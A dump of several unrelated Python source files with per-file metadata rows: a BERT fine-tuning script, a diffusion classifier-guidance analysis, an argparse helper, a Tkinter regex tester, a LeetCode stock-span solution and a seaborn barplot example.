with open(os.path.join(exp_name, 'params.json'), 'w') as fp:
label_dict = {int(k):int(v) for k,v in label_dict.items() }
json.dump(label_dict, fp)
# logging the location of dump dict
logging.info("Dump label_dict location: {}".format(os.path.join(exp_name, 'params.json')))
df['label'] = df.BROWSE_NODE_ID.replace(label_dict)
df = df.dropna()
# drop row if no of label in BROWSE_NODE_ID is less than 2
X_train, X_val, y_train, y_val = train_test_split(df.index.values,
df.label.values,
test_size=0.35,
random_state=44)
df['data_type'] = ['not_set']*df.shape[0]
df.loc[X_train, 'data_type'] = 'train'
df.loc[X_val, 'data_type'] = 'val'
encoded_data_train = tokenizer.batch_encode_plus(
df[df.data_type=='train'].BULLET_POINTS.values.tolist(),
add_special_tokens=True,
return_attention_mask=True,
pad_to_max_length=True,
max_length=512,
return_tensors='pt'
)
# logging of encoded data
logging.info("Encoded train data: encoded_data_train")
encoded_data_val = tokenizer.batch_encode_plus(
df[df.data_type=='val'].BULLET_POINTS.values.tolist(),
add_special_tokens=True,
return_attention_mask=True,
pad_to_max_length=True,
max_length=512,
return_tensors='pt'
)
logging.info("Encoded val data: encoded_data_val")
#torch.save(encoded_data_train, exp_name+"/encoded_data_train.pt")
#torch.save(encoded_data_val, exp_name+"/encoded_data_val.pt")
logging.info("Dumped encoded_data_train.pt and encoded_data_val.pt")
input_ids_train = encoded_data_train['input_ids']
attention_masks_train = encoded_data_train['attention_mask']
labels_train = torch.tensor(df[df.data_type=='train'].label.values)
input_ids_val = encoded_data_val['input_ids']
attention_masks_val = encoded_data_val['attention_mask']
labels_val = torch.tensor(df[df.data_type=='val'].label.values)
dataset_train = TensorDataset(input_ids_train, attention_masks_train, labels_train)
dataset_val = TensorDataset(input_ids_val, attention_masks_val, labels_val)
## BERT MODEL
logging.info("Loading AutoModel model")
model = AutoModelForSequenceClassification.from_pretrained(args.model,
num_labels=len(label_dict),
output_attentions=False,
output_hidden_states=False)
if args.loading_from_prev_pretrain:
logging.info("Loading pretrained model")
model.load_state_dict(torch.load(args.trained_model))
model = nn.DataParallel(model)
logging.info("using Multi GPU data parallel")
## DataLoader
batch_size_train = args.batch_size_train
batch_size_val = args.batch_size_val
logging.info("batch size train: {}" .format(batch_size_train))
logging.info("batch size val: {}" .format(batch_size_val))
dataloader_train = DataLoader(dataset_train,
sampler=RandomSampler(dataset_train),
batch_size=batch_size_train)
dataloader_validation = DataLoader(dataset_val,
sampler=SequentialSampler(dataset_val),
batch_size=batch_size_val)
#optimizer = AdamW(model.parameters(),
# lr=1e-5,
# eps=1e-8)
epochs = args.epochs
weight_decay = 0.01
logging.info("epochs: {}" .format(epochs))
if args.full_finetuning:
param_optimizer = list(model.named_parameters())
no_decay = ['bias', 'LayerNorm.bias', 'LayerNorm.weight']
optimizer_grouped_parameters = [
{'params': [p for n, p in param_optimizer if not any(nd in n for nd in no_decay)],
'weight_decay': weight_decay},
{'params': [p for n, p in param_optimizer if any(nd in n for nd in no_decay)],
'weight_decay': 0.0}
]
        # full fine-tuning: embedding (tokenizer + pretrained base) -> transformer stack -> classifier head; all layers are trainable
else: # only finetune the head classifier
param_optimizer = list(model.classifier.named_parameters())
optimizer_grouped_parameters = [{'params': [p for n, p in param_optimizer]}]
optimizer = AdamW(optimizer_grouped_parameters, lr=1e-5, correct_bias=False)
scheduler = get_linear_schedule_with_warmup(optimizer,
num_warmup_steps=0,
num_training_steps=len(dataloader_train)*epochs)
device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
#model.to(device)
model = model.to(0)
logging.info("Device: {}" .format(device))
#print(device)
best_acc = 0.0
patience_counter = 0
# logging all the paramters of agrs
#logging.info("Training Arguments: {}" .format(args))
for epoch in tqdm(range(1, epochs+1)):
if args.full_finetuning:
model.train()
else:
model.classifier.train()
loss_train_total = 0
progress_bar = tqdm(dataloader_train, desc='Epoch {:1d}'.format(epoch), leave=False, disable=False)
for batch in progress_bar:
model.zero_grad()
batch = tuple(b.to(0) for b in batch)
inputs = {'input_ids': batch[0],
'attention_mask': batch[1],
'labels': batch[2],
}
outputs = model(**inputs)
loss = outputs[0]
loss = loss.mean()
loss_train_total += loss.item()
loss.backward()
torch.nn.utils.clip_grad_norm_(model.parameters(), 1.0)
optimizer.step()
scheduler.step()
progress_bar.set_postfix({'training_loss': '{:.3f}'.format(loss.item()/len(batch))})
torch.save(model.state_dict(), f'{exp_name}/finetuned_BERT_epoch_{epoch}.model')
tqdm.write(f'\nEpoch {epoch}')
loss_train_avg = loss_train_total/len(dataloader_train)
tqdm.write(f'Training loss: {loss_train_avg}')
val_loss, predictions, true_vals = evaluate(dataloader_validation, model)
val_f1, acc = f1_score_func(predictions, true_vals)
tqdm.write(f'Validation loss: {val_loss}')
tqdm.write(f'F1 Score (Weighted): {val_f1}')
logging.info(f'F1 Score (Weighted): {val_f1}')
logging.info(f'Accuracy: {acc}')
improve_acc = acc - best_acc
patience = 0.02
patience_num = 10
min_epoch_num =5
if improve_acc > 1e-5:
logging.info("- Found new best Accuarcy")
best_acc = acc
torch.save(model.state_dict(), f'{exp_name}/finetuned_BERT_best.model')
if improve_acc < patience:
patience_counter += 1
else:
patience_counter = 0
else:
patience_counter += 1
# Early stopping and logging best f1
if (patience_counter >= patience_num and epoch > min_epoch_num) or epoch == epochs:
logging.info("Best val f1: {:05.2f}".format(best_acc))
break
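# --- Hypothetical command line (added; every path and value is illustrative only) ---
#   python src/train.py --model roberta-base --experiment_name roberta-run1 \
#       --epochs 5 --batch_size_train 32 --batch_size_val 32
# The flags map to the argparse options defined at the top of this script; training
# data is read from the hard-coded custum-data/train.csv and custum-data/val.csv files.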
| 37.24924 | 172 | 0.613382 | 1,486 | 12,255 | 4.824361 | 0.222746 | 0.033756 | 0.023713 | 0.007253 | 0.227089 | 0.188869 | 0.162645 | 0.126238 | 0.116195 | 0.090947 | 0 | 0.009367 | 0.276948 | 12,255 | 328 | 173 | 37.362805 | 0.799684 | 0.101346 | 0 | 0.168182 | 0 | 0 | 0.142714 | 0.029599 | 0 | 0 | 0 | 0 | 0 | 1 | 0.004545 | false | 0 | 0.086364 | 0 | 0.095455 | 0.004545 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62134616f3fd788b3a75e202a5e94200490ab80e | 11,438 | py | Python | get_classifier_groundth_guidance.py | ZGCTroy/guided-diffusion | af987bb2b65db2875148a5466df79736ea5ae6a1 | [
"MIT"
] | null | null | null | get_classifier_groundth_guidance.py | ZGCTroy/guided-diffusion | af987bb2b65db2875148a5466df79736ea5ae6a1 | [
"MIT"
] | null | null | null | get_classifier_groundth_guidance.py | ZGCTroy/guided-diffusion | af987bb2b65db2875148a5466df79736ea5ae6a1 | [
"MIT"
] | null | null | null | """
Like image_sample.py, but use a noisy image classifier to guide the sampling
process towards more realistic images.
"""
import argparse
import os
import numpy as np
import torch as th
import torch.distributed as dist
import torch.nn.functional as F
from guided_diffusion.image_datasets import load_data
import matplotlib.pyplot as plt
from guided_diffusion import dist_util, logger
from guided_diffusion.script_util import (
model_defaults,
diffusion_defaults,
classifier_defaults,
create_model,
create_gaussian_diffusion,
create_classifier,
add_dict_to_argparser,
args_to_dict,
)
from guided_diffusion.sample_util import save_samples
from tqdm import tqdm
def get_gathered_item(x):
gathered_x = [th.zeros_like(x) for _ in range(dist.get_world_size())]
dist.all_gather(gathered_x, x)
return gathered_x
def main():
args = create_argparser().parse_args()
visible_gpus_list = []
if args.gpus:
visible_gpus_list = [str(gpu_id) for gpu_id in args.gpus.split(",")]
dist_util.setup_dist(visible_gpu_list=visible_gpus_list, local_rank=args.local_rank)
logger.configure(dir=os.path.join(args.log_root, args.save_name))
logger.log(args)
logger.log("creating model and diffusion...")
model = create_model(
**args_to_dict(args, model_defaults().keys())
)
diffusion = create_gaussian_diffusion(
**args_to_dict(args, diffusion_defaults().keys())
)
if args.model_path:
model.load_state_dict(
dist_util.load_state_dict(args.model_path, map_location="cpu"),
strict=True
)
model.to(dist_util.dev())
if args.use_fp16:
model.convert_to_fp16()
model.eval()
classifier = create_classifier(
**args_to_dict(args, classifier_defaults().keys())
)
if args.classifier_path:
logger.log("loading classifier from {}".format(args.classifier_path))
classifier.load_state_dict(
dist_util.load_state_dict(args.classifier_path, map_location="cpu"),
strict=True
)
classifier.to(dist_util.dev())
if args.classifier_use_fp16:
classifier.convert_to_fp16()
classifier.eval()
step_size = 25 if args.timestep_respacing == 'ddim25' else args.timestep_respacing
batch_grad_norm = th.zeros((step_size, args.batch_size,), device=dist_util.dev())
batch_updated_grad_norm = th.zeros((step_size, args.batch_size,), device=dist_util.dev())
batch_probability = th.zeros((step_size, args.batch_size,), device=dist_util.dev())
batch_entropy = th.zeros((step_size, args.batch_size,), device=dist_util.dev())
batch_entropy_scale = th.zeros((step_size, args.batch_size,), device=dist_util.dev())
batch_probability_distribution = th.zeros((step_size, args.batch_size, args.classifier_out_channels,), device=dist_util.dev())
def cond_fn(x, t, y=None, prior_variance=1.0, t_range_start=0, t_range_end=1000):
assert y is not None
step_id = t[0].item() // 40
with th.enable_grad():
x_in = x.detach().requires_grad_(True)
output = classifier(x_in, t)
logits = output
log_probs = F.log_softmax(logits, dim=-1) # (B, C)
selected = log_probs[range(len(logits)), y.view(-1)] # (B, )
cond_grad = th.autograd.grad(selected.sum(), x_in)[0]
cond_grad = cond_grad * args.classifier_scale
with th.no_grad():
if args.use_cond_range_scale:
if t[0] >= 600 and t[0] < 800:
cond_grad = cond_grad * 3
probs = F.softmax(logits, dim=-1) # (B, C)
entropy = (-log_probs * probs).sum(dim=-1) # (B, )
entropy_scale = 1.0 / (entropy / np.log(args.classifier_out_channels)) # (B, )
original_grad_norm = th.norm(cond_grad, p=2, dim=(1, 2, 3), dtype=th.float32).detach()
batch_probability[step_id] = probs[range(len(logits)), y.view(-1)]
batch_probability_distribution[step_id] = probs
batch_grad_norm[step_id] = original_grad_norm
batch_entropy[step_id] = entropy
batch_entropy_scale[step_id] = entropy_scale
logger.log(
'\n',
't = ', t[0].detach(), '\n',
'\t\t mean std median', '\n',
'\t\t grad_norm =', original_grad_norm.mean(-1).detach(),
original_grad_norm.std(-1).detach(), original_grad_norm.median(-1).values, '\n',
'\t\t logits = ', selected.mean(-1).detach(),
selected.std(-1).detach(), selected.median(-1).values, '\n',
'\t\t entropy = ', entropy.mean(-1).detach(), entropy.std(-1).detach(), entropy.median(-1).values, '\n',
'\t\t entropy_scale = ', entropy_scale.mean(-1).detach(), entropy_scale.std(-1).detach(), entropy_scale.median(-1).values, '\n',
)
if args.use_entropy_scale and (t[0] >= t_range_start and t[0] < t_range_end):
cond_grad = cond_grad * entropy_scale.reshape(-1, 1, 1, 1).repeat(1, *cond_grad[0].shape)
updated_grad_norm = th.norm(cond_grad, p=2, dim=(1, 2, 3), dtype=th.float32).detach()
            batch_updated_grad_norm[step_id] = updated_grad_norm
logger.log(
'\t\t updated_grad_norm = ', updated_grad_norm.mean(-1).detach(), updated_grad_norm.std(-1).detach(), updated_grad_norm.median(-1).values, '\n',
'\n'
)
return cond_grad
def model_fn(x, t, y=None, t_range_start=0, t_range_end=1000):
assert y is not None
return model(x, t, y if args.class_cond else None)
data_loader = load_data(
data_dir=args.data_dir,
batch_size=args.batch_size,
image_size=args.classifier_image_size,
class_cond=True,
random_crop=True,
dataset_type=args.dataset_type,
used_attributes=args.used_attributes,
tot_class=args.tot_class,
imagenet200_class_list_file_path=args.imagenet200_class_list_file_path,
celeba_attribures_path=args.celeba_attribures_path
)
logger.log("sampling...")
all_images, all_labels = [], []
all_grad_norm = []
all_updated_grad_norm = []
all_probability = []
all_entropy = []
all_entropy_scale = []
all_probability_distribution = []
id = 0
while len(all_images) * args.batch_size < args.num_samples:
id += 1
batch, extra = next(data_loader)
labels = extra["y"].to(dist_util.dev()) # labels: (B, )
batch = batch.to(dist_util.dev()) # batch: (B, C, H, W)
for t in range(24, -1, -1):
batch_t = th.ones(batch.shape[0], dtype=th.long, device=dist_util.dev()) * t
diffused_batch = diffusion.q_sample(batch, batch_t)
cond_grad = cond_fn(
x=diffused_batch,
t=batch_t * 40,
y=labels,
prior_variance=1.0,
t_range_start=0,
t_range_end=1000
)
gathered_samples = get_gathered_item(diffused_batch)
all_images.extend([sample.cpu().numpy() for sample in gathered_samples])
gathered_labels = get_gathered_item(labels)
all_labels.extend([labels.cpu().numpy() for labels in gathered_labels])
logger.log(f"created {len(all_images) * args.batch_size} / {args.num_samples} samples")
gathered_batch_grad_norm = get_gathered_item(batch_grad_norm)
gathered_batch_updated_grad_norm = get_gathered_item(batch_updated_grad_norm)
gathered_batch_probability = get_gathered_item(batch_probability)
gathered_batch_entropy = get_gathered_item(batch_entropy)
gathered_batch_entropy_scale = get_gathered_item(batch_entropy_scale)
gathered_batch_probability_distribution = get_gathered_item(batch_probability_distribution)
all_grad_norm.extend([x.cpu().numpy() for x in gathered_batch_grad_norm])
all_updated_grad_norm.extend([x.cpu().numpy() for x in gathered_batch_updated_grad_norm])
all_probability.extend([x.cpu().numpy() for x in gathered_batch_probability])
all_entropy.extend([x.cpu().numpy() for x in gathered_batch_entropy])
all_entropy_scale.extend([x.cpu().numpy() for x in gathered_batch_entropy_scale])
all_probability_distribution.extend([x.cpu().numpy() for x in gathered_batch_probability_distribution])
if dist.get_rank() == 0:
arr = np.concatenate(all_images, axis=0)
arr = arr[: args.num_samples]
label_arr = np.concatenate(all_labels, axis=0)
label_arr = label_arr[: args.num_samples]
all_grad_norm = np.concatenate(all_grad_norm, axis=1)[:args.num_samples]
all_updated_grad_norm = np.concatenate(all_updated_grad_norm, axis=1)[:args.num_samples]
all_probability = np.concatenate(all_probability, axis=1)[:args.num_samples]
all_entropy = np.concatenate(all_entropy, axis=1)[:args.num_samples]
all_entropy_scale = np.concatenate(all_entropy_scale, axis=1)[:args.num_samples]
all_probability_distribution = np.concatenate(all_probability_distribution, axis=1)[:args.num_samples]
shape_str = "x".join([str(x) for x in arr.shape])
out_path = os.path.join(logger.get_dir(), "scale{}_steps{}_class0-{}_samples_{}.npz".format(args.classifier_scale, args.timestep_respacing, args.tot_class - 1, shape_str))
logger.log(f"saving to {out_path}")
np.savez(out_path, arr, label_arr)
metainfo_out_path = os.path.join(logger.get_dir(), "metainfo_scale{}_steps{}_class0-{}_samples_{}.npz".format(args.classifier_scale, args.timestep_respacing, args.tot_class - 1, shape_str))
np.savez(metainfo_out_path, all_grad_norm=all_grad_norm, all_updated_grad_norm=all_updated_grad_norm,
all_probability=all_probability, all_entropy=all_entropy, all_entropy_scale=all_entropy_scale,
all_probability_distribution=all_probability_distribution)
# sample_dir = "images_" + "scale{}_steps{}_sample{}".format(args.classifier_scale, args.timestep_respacing, args.num_samples)
# save_samples(arr, label_arr, args.classifier_out_channels, sample_dir=sample_dir)
dist.barrier()
logger.log("sampling complete")
def create_argparser():
defaults = dict(
clip_denoised=True,
num_samples=10000,
batch_size=16,
use_ddim=False,
model_path="",
classifier_path="",
classifier_scale=1.0,
log_root="",
save_name="",
gpus="",
t_range_start=0,
t_range_end=1000,
use_entropy_scale=False,
expected_classifier_gradient_value=-1.0,
selected_class=-1,
use_cond_range_scale=False,
data_dir="",
val_data_dir="",
tot_class=1000,
dataset_type='imagenet-1000',
used_attributes="",
imagenet200_class_list_file_path="",
celeba_attribures_path="",
)
defaults.update(diffusion_defaults())
defaults.update(model_defaults())
defaults.update(classifier_defaults())
parser = argparse.ArgumentParser()
parser.add_argument("--local_rank", type=int, default=0)
add_dict_to_argparser(parser, defaults)
return parser
if __name__ == "__main__":
main()
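# --- Hypothetical command line (added; paths and values are illustrative only) ---
#   python get_classifier_groundth_guidance.py --data_dir /path/to/imagenet \
#       --model_path models/diffusion.pt --classifier_path models/classifier.pt \
#       --classifier_scale 1.0 --timestep_respacing ddim25 --num_samples 1000 \
#       --batch_size 16 --gpus 0
# All flags correspond to entries in the defaults dict built by create_argparser()
# plus the model/diffusion/classifier defaults imported from script_util.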
| 39.993007 | 197 | 0.657283 | 1,543 | 11,438 | 4.540506 | 0.146468 | 0.038824 | 0.036397 | 0.016985 | 0.369969 | 0.307879 | 0.252641 | 0.220383 | 0.175707 | 0.14145 | 0 | 0.016216 | 0.223641 | 11,438 | 285 | 198 | 40.133333 | 0.772748 | 0.034097 | 0 | 0.035398 | 0 | 0 | 0.040518 | 0.008067 | 0 | 0 | 0 | 0 | 0.00885 | 1 | 0.022124 | false | 0 | 0.053097 | 0 | 0.09292 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62149f7e39d96fa202074b79f760cbbfe9a7a331 | 504 | py | Python | portainer/app/__init__.py | duedil-ltd/portainer | 280a9e298042269419774382bd58825354f0132b | [
"MIT"
] | 62 | 2015-01-14T15:30:46.000Z | 2021-12-06T14:33:20.000Z | portainer/app/__init__.py | duedil-ltd/portainer | 280a9e298042269419774382bd58825354f0132b | [
"MIT"
] | 27 | 2015-01-22T13:53:11.000Z | 2017-03-15T21:44:31.000Z | portainer/app/__init__.py | duedil-ltd/portainer | 280a9e298042269419774382bd58825354f0132b | [
"MIT"
] | 18 | 2015-08-20T20:23:51.000Z | 2018-11-19T16:03:04.000Z | """
"""
import argparse
parser = argparse.ArgumentParser(
prog="portainer",
fromfile_prefix_chars="@"
)
subparsers = parser.add_subparsers()
def subcommand(name, callback=None):
"""A decorator for main functions to add themselves as subcommands."""
def decorator(fn):
subparser = subparsers.add_parser(name)
subparser.set_defaults(_fn=fn, _name=name, _parser=subparser)
if callback:
callback(subparser)
return fn
return decorator
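# --- Hypothetical usage sketch (added; names below are illustrative only) ---
# A command module would register its entry point via the decorator:
#
#   @subcommand("build", callback=lambda sp: sp.add_argument("--tag"))
#   def build_main(args):
#       print("building image", args.tag)
#
# and a launcher would then dispatch on the parsed arguments:
#
#   args = parser.parse_args()
#   args._fn(args)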
| 18 | 74 | 0.668651 | 54 | 504 | 6.092593 | 0.574074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228175 | 504 | 27 | 75 | 18.666667 | 0.845758 | 0.126984 | 0 | 0 | 0 | 0 | 0.023419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.071429 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621631adcf8c4cf0b96d0c782bffb9ce30534b16 | 6,647 | pyw | Python | regexp_checker.pyw | Storvild/python_regexp_checker | e3cfe817f5377aa1f64aa4a110b5bb2ead573679 | [
"Apache-2.0"
] | null | null | null | regexp_checker.pyw | Storvild/python_regexp_checker | e3cfe817f5377aa1f64aa4a110b5bb2ead573679 | [
"Apache-2.0"
] | null | null | null | regexp_checker.pyw | Storvild/python_regexp_checker | e3cfe817f5377aa1f64aa4a110b5bb2ead573679 | [
"Apache-2.0"
] | null | null | null | from tkinter import *
from tkinter import messagebox
import re
import json
SRE_FLAG_TEMPLATE = 1 # template mode (disable backtracking)
SRE_FLAG_IGNORECASE = 2 # case insensitive
SRE_FLAG_LOCALE = 4 # honour system locale
SRE_FLAG_MULTILINE = 8 # treat target as multiline string
SRE_FLAG_DOTALL = 16 # treat target as a single string
SRE_FLAG_UNICODE = 32 # use unicode "locale"
SRE_FLAG_VERBOSE = 64 # ignore whitespace and comments
SRE_FLAG_DEBUG = 128 # debugging
SRE_FLAG_ASCII = 256 # use ascii "locale"
EXAMPLE_TEXT = 'My 123 Test 456'
EXAMPLE_PATTERN = 'My (?P<first>\d+) T(.?)st (?P<second>\d+)'
def exec_pattern(event):
try:
search_res = re.search(get_pattern(), get_source(), get_ignorecase() | get_dotall() | get_multiline())
#result = search_res.groupdict()
#result = search_res.groups()
result = search_res
if result:
set_result(result)
add_result('groups ({}):'.format(len(result.groups())))
add_result(result.groups())
add_result('groupdict ({}):'.format(len(result.groupdict())))
group_dict = json.dumps(result.groupdict(), ensure_ascii=False, indent=4)
#group_dict = result.groupdict()
add_result(group_dict)
#text_result.insert(1.0, result)
else:
set_result('ДАННЫЕ НЕ НАЙДЕНЫ!')
#text_result.delete(1.0, END)
#text_result.insert(1.0, 'Данные не неайдены!')
print(result)
except Exception as e:
set_result('ОШИБКА:')
add_result(e)
#text_result.delete(1.0, END)
#text_result.insert(1.0, e)
def but_test():
exec_pattern(None)
#messagebox.showinfo("GUI Python", text_pattern.get(1.0, END))
#text_source.insert(1.0, 'text')
#text_source.delete(1.0, END)
root = Tk()
root.title("GUI на Python")
#root.geometry("300x250")
root.event_add('<<Paste>>', '<Control-igrave>') # by default Ctrl+м (Paste in the Russian layout) does not work
root.event_add("<<Copy>>", "<Control-ntilde>") # by default Ctrl+с (Copy in the Russian layout) does not work
root.event_add("<<Cut>>", "<Control-division>") # <<Cut>> Ctrl+с 0247 division
root.event_add("<<Undo>>", "<Control-ydiaeresis>") #<<Undo>> Ctrl+z Ctrl+я 0255 ydiaeresis
#https://ru.stackoverflow.com/questions/816947/Почему-с-rus-раскладкой-ctrv-и-ctrc-не-работает-а-с-eng-все-работаетtkinter
#message = StringVar()
frame1 = Frame(bg='yellow')
frame1.pack(fill=BOTH)
def get_source():
return text_source.get(1.0, END).strip()
text_source = Text(frame1, height=10, bg='#EEE')
text_source.pack(side=TOP, fill=BOTH, expand=1) #anchor=SE
#scroll1 = Scrollbar(frame1, command=text_source.yview)
#scroll1.pack(side=RIGHT, expand=0.1)
#text_source.config(yscrollcommand=scroll1.set)
text_source.bind('<KeyRelease>', exec_pattern)
def get_pattern():
return text_pattern.get(1.0, END).strip()
text_pattern = Text(height=6)
text_pattern.pack(side=TOP, fill=BOTH, expand=1)
#text_pattern.bind('<Key>', exec_pattern)
#text_pattern.bind('<KeyPress>', exec_pattern)
text_pattern.bind('<KeyRelease>', exec_pattern)
text_pattern.focus_set()
frame_buttons = Frame() #bg='gray'
frame_buttons.pack(fill=Y)
but1 = Button(frame_buttons, text='RUN CHECK', command=but_test)
but1.pack(side=LEFT, expand=1)
var_multiline = BooleanVar()
cb_multiline = Checkbutton(frame_buttons, text='MULTILINE', variable=var_multiline, onvalue=SRE_FLAG_MULTILINE, offvalue=0)
cb_multiline.pack(side=RIGHT)
cb_multiline.select()
var_ignorecase = BooleanVar()
cb_ignorecase = Checkbutton(frame_buttons, text='IGNORECASE', variable=var_ignorecase, onvalue=SRE_FLAG_IGNORECASE, offvalue=0)
cb_ignorecase.pack(side=RIGHT)
cb_ignorecase.select()
#var_ignorecase.set(0)
var_dotall = BooleanVar()
cb_dotall = Checkbutton(frame_buttons, text='DOTALL', variable=var_dotall, onvalue=SRE_FLAG_DOTALL, offvalue=0)
cb_dotall.pack(side=RIGHT)
cb_dotall.select()
def get_multiline():
if var_multiline.get():
return re.MULTILINE
else:
return 0
def get_ignorecase():
if var_ignorecase.get():
return re.IGNORECASE
else:
return 0
def get_dotall():
if var_dotall.get():
return re.DOTALL
else:
return 0
def set_wordwrap():
if var_wordwrap.get():
text_source.config(wrap=WORD)
else:
text_source.config(wrap=NONE)
#messagebox.showinfo("GUI Python", 'TEST')
var_wordwrap = BooleanVar()
cb_wordwrap = Checkbutton(frame_buttons, text='WordWrap', variable=var_wordwrap, onvalue=1, offvalue=0, command=set_wordwrap)
cb_wordwrap.pack(side=RIGHT)
cb_wordwrap.select()
def set_result(var):
text_result.delete(1.0, END)
text_result.insert(1.0, var)
def add_result(var):
text_result.insert(END, '\n')
text_result.insert(END, var)
text_result = Text(height=10, fg='black', bg='#DDD')
text_result.pack(side=TOP, fill=BOTH, expand=1)
#message = StringVar()
#message_entry = Entry(textvariable=message)
#message_entry.place(relx=.5, rely=.1, anchor="c")
#message_button = Button(text="Click Me", command=show_message)
#message_button.place(relx=.5, rely=.5, anchor="c")
# Context menu
def func(event):
root.menu.post(event.x_root, event.y_root)
root.w = event.widget
root.menu = Menu(tearoff=0)
root.menu.add_command(label="Вырезать", accelerator="Ctrl+X",
command=lambda: root.w.focus_force() or root.w.event_generate("<<Cut>>"))
root.menu.add_command(label="Копировать", accelerator="Ctrl+С",
command=lambda: root.w.focus_force() or root.w.event_generate("<<Copy>>"))
root.menu.add_command(label="Вставить", accelerator="Ctrl+V",
command=lambda: root.w.focus_force() or root.w.event_generate("<<Paste>>"))
root.menu.add_command(label="Удалить", accelerator="Delete",
command=lambda: root.w.focus_force() or root.w.event_generate("<<Clear>>"))
root.menu.add_separator()
root.menu.add_command(label="Выделить все", accelerator="Ctrl+A",
command=lambda: root.w.focus_force() or root.w.event_generate("<<SelectAll>>"))
text_source.bind("<Button-3>", func)
text_pattern.bind("<Button-3>", func)
# End of context menu
# INSERTING THE EXAMPLE
text_source.insert(1.0, EXAMPLE_TEXT)
text_pattern.insert(1.0, EXAMPLE_PATTERN)
exec_pattern(None)
root.mainloop()
# Paste via Ctrl+V does not work
# No context menu with Paste, Copy
# Ctrl+F does not work
| 34.801047 | 128 | 0.678351 | 908 | 6,647 | 4.789648 | 0.26652 | 0.006438 | 0.012877 | 0.020694 | 0.212463 | 0.129455 | 0.100023 | 0.082088 | 0.082088 | 0.082088 | 0 | 0.019647 | 0.180683 | 6,647 | 190 | 129 | 34.984211 | 0.77892 | 0.241312 | 0 | 0.081967 | 0 | 0 | 0.093861 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090164 | false | 0 | 0.032787 | 0.016393 | 0.188525 | 0.008197 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62177de7b37043305088aa00516739d705678fa0 | 684 | py | Python | solutions/python3/901.py | sm2774us/amazon_interview_prep_2021 | f580080e4a6b712b0b295bb429bf676eb15668de | [
"MIT"
] | 42 | 2020-08-02T07:03:49.000Z | 2022-03-26T07:50:15.000Z | solutions/python3/901.py | ajayv13/leetcode | de02576a9503be6054816b7444ccadcc0c31c59d | [
"MIT"
] | null | null | null | solutions/python3/901.py | ajayv13/leetcode | de02576a9503be6054816b7444ccadcc0c31c59d | [
"MIT"
] | 40 | 2020-02-08T02:50:24.000Z | 2022-03-26T15:38:10.000Z | class StockSpanner:
def __init__(self):
self.arr = []
self.res = []
def next(self, price):
"""
:type price: int
:rtype: int
"""
if self.arr and self.arr[-1] > price: self.res.append(1)
else:
i = len(self.arr) - 1
while i >= 0:
if self.arr[i] <= price and self.res[i]:
i -= self.res[i]
else: break
self.res.append(len(self.arr) - i)
self.arr.append(price)
return self.res[-1]
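# --- Worked example (added; matches the LeetCode 901 sample) ---
# spanner = StockSpanner()
# [spanner.next(p) for p in [100, 80, 60, 70, 60, 75, 85]]  # -> [1, 1, 1, 2, 1, 4, 6]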
# Your StockSpanner object will be instantiated and called as such:
# obj = StockSpanner()
# param_1 = obj.next(price) | 25.333333 | 67 | 0.486842 | 86 | 684 | 3.813953 | 0.383721 | 0.14939 | 0.054878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014252 | 0.384503 | 684 | 27 | 68 | 25.333333 | 0.764846 | 0.207602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6217889c1bbbef2a3d7e2394bbae342042ec5c78 | 419 | py | Python | examples/grouped_barplot.py | Pratik325/seaborn | f123d9b9f46caea4942f392e8f8d1805c121fe01 | [
"BSD-3-Clause"
] | null | null | null | examples/grouped_barplot.py | Pratik325/seaborn | f123d9b9f46caea4942f392e8f8d1805c121fe01 | [
"BSD-3-Clause"
] | null | null | null | examples/grouped_barplot.py | Pratik325/seaborn | f123d9b9f46caea4942f392e8f8d1805c121fe01 | [
"BSD-3-Clause"
] | 1 | 2020-10-15T04:56:00.000Z | 2020-10-15T04:56:00.000Z | """
Grouped barplots
================
_thumb: .36, .5
"""
import seaborn as sns
sns.set(style="whitegrid")
penguins = sns.load_dataset("penguins")
# Draw a nested barplot by species and sex
g = sns.catplot(
data=penguins, kind="bar",
x="species", y="body_mass_g", hue="sex",
ci="sd", palette="dark", alpha=.6, height=6
)
g.despine(left=True)
g.set_axis_labels("", "Body mass (g)")
g.legend.set_title("")
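# Usage note (not part of the original gallery example): when this file is run as
# a standalone script rather than through the seaborn documentation build, the
# figure still needs an explicit call to be displayed.
import matplotlib.pyplot as plt
plt.show()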
